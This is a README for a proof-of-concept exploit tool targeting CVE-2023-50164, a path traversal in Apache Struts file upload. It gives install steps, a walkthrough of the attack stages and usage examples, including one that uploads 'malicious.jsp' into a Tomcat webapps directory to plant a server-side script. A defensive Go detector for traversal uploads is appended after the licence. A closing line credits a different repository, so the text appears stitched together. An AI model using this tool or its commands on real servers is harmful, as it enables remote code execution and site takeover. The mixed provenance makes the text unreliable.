PoC for CVE-2023-50164
===

Install
---

To install this tool you must have Go version 1.20 or later installed and configured.

```
$ go install github.com/dwisiswant0/cve-2023-50164-poc@latest
```

Alternatively, you can build it from source yourself:

```
$ git clone http://github.com/dwisiswant0/cve-2023-50164-poc cve-2023-50164-poc/
$ cd $_
$ go build .
```

How it Works
---

This tool operates through a series of stages to execute the exploit. For instance, if you want to upload the file `/path/to/file-you-want-to-upload.txt`, the tool proceeds as follows:

1. It compresses the specified file into a WAR file, generating `file-you-want-to-upload.war` in the OS-specific temporary directory. The tool therefore assumes that the servlet context file path is `/file-you-want-to-upload/file-you-want-to-upload.txt`.
2. It checks whether the servlet context file path already exists. If it does, the tool immediately returns an error.
3. The tool attempts to upload the WAR file by manipulating the file upload parameters.
4. Finally, it double-checks the availability (status code 200) of the servlet context file path, which indicates a successful upload.

Usage
---

```
$ cve-2023-50164-poc -h
PoC for CVE-2023-50164 -- coded by @dwisiswant0

Usage:
  cve-2023-50164-poc -u <URL> -f <FILE> -p <PATH>

Options:
  -u, --url <URL>          Specify the upload endpoint URL
  -f, --file <FILE>        Provide the payload file for uploading
  -t, --traverse-seq <N>   Generate traversal sequences N times (default: "0")
  -p, --path <PATH>        Specify the path to the accessible root directory
  -w, -win, --windows      Converts slash ("/") chars to Windows separator ("\")

Example:
  cve-2023-50164-poc -u http://host/path/to/upload.action -f foo.txt -t 1 -p webapps
  cve-2023-50164-poc -u http://host/upload/upload.action -f malicious.jsp -t 2 -p /opt/tomcat/webapps
```

Notes
---

1. The `jar` binary should be present in your system's `$PATH`.
2. The target path should be an accessible root path, such as `/var/lib/jetty/webapps` for Jetty or `/opt/tomcat/webapps` for Apache Tomcat.
3. The default number of traversal sequences is zero ("0"); you can also enter the traversal sequences manually in the `-p`/`--path` flag value, e.g. `/../webapps` or `/../../opt/tomcat/webapps`. The traversal sequences will differ for each servlet.
4. The `-w`/`-win`/`--windows` flag is only used when the servlet runs on a Windows server.

Disclaimer
---

Using this tool to attack targets without mutual consent is illegal. Users must follow local, state, and federal laws. The developer ("dwisiswant0"/"Dwi Siswanto") is NOT responsible for any damage caused by misuse of the tool.

License
---

This tool is licensed under WTFPL v2 (DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE). See COPYING.
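As an added defensive example (not part of this repository's code), the following Go snippet checks an incoming multipart upload for the pattern the stages under "How it Works" rely on: traversal sequences in either separator style and a WAR archive named as the target. The multipart body, its boundary and the field names `upload` and `uploadFileName` are constructed for the example; the one real-library caveat it demonstrates is that Go's `Part.FileName()` already applies `filepath.Base`, so a detector must read the raw header.

```go
package main
import (
	"fmt"
	"io"
	"mime"
	"mime/multipart"
	"strings"
)
// Finding records one multipart field that shows the pattern the stages above rely on.
type Finding struct{ Field, Value, Reason string }
// Constructed body (not captured traffic): a traversing filename, a Windows-style plain field, a benign field.
const sampleBoundary = "xyz"
const sampleBody = "--xyz\r\nContent-Disposition: form-data; name=\"upload\"; filename=\"../../webapps/foo.war\"\r\n\r\nPK\x03\x04\r\n" +
	"--xyz\r\nContent-Disposition: form-data; name=\"uploadFileName\"\r\n\r\n..\\..\\webapps\\foo.war\r\n" +
	"--xyz\r\nContent-Disposition: form-data; name=\"description\"\r\n\r\nquarterly report\r\n--xyz--\r\n"
// flag treats both separator styles alike (the -w trick), then reports a ".." segment or a .war target.
func flag(field, value string) (out []Finding) {
	norm := strings.ReplaceAll(value, "\\", "/")
	if strings.Contains("/"+norm+"/", "/../") {
		out = append(out, Finding{field, value, "traversal sequence"})
	}
	if strings.HasSuffix(strings.ToLower(norm), ".war") {
		out = append(out, Finding{field, value, "WAR archive as target"})
	}
	return out
}
// InspectUpload walks every part. It parses the raw Content-Disposition header rather than
// calling Part.FileName(), which applies filepath.Base and would strip the sequence we look for.
func InspectUpload(body, boundary string) (out []Finding, err error) {
	mr := multipart.NewReader(strings.NewReader(body), boundary)
	for {
		p, err := mr.NextPart()
		if err == io.EOF {
			return out, nil
		} else if err != nil {
			return nil, err
		}
		_, params, _ := mime.ParseMediaType(p.Header.Get("Content-Disposition")) // unparsable header: empty map, not flagged
		val, isFile := params["filename"]
		if !isFile { // plain field: its value is the candidate path
			b, err := io.ReadAll(p)
			if err != nil {
				return nil, err
			}
			val = string(b)
		}
		out = append(out, flag(params["name"], val)...)
	}
}
func main() { fmt.Println(InspectUpload(sampleBody, sampleBoundary)) }
```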
muhammedabdelkader/cve-2023-50164-poc
Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164")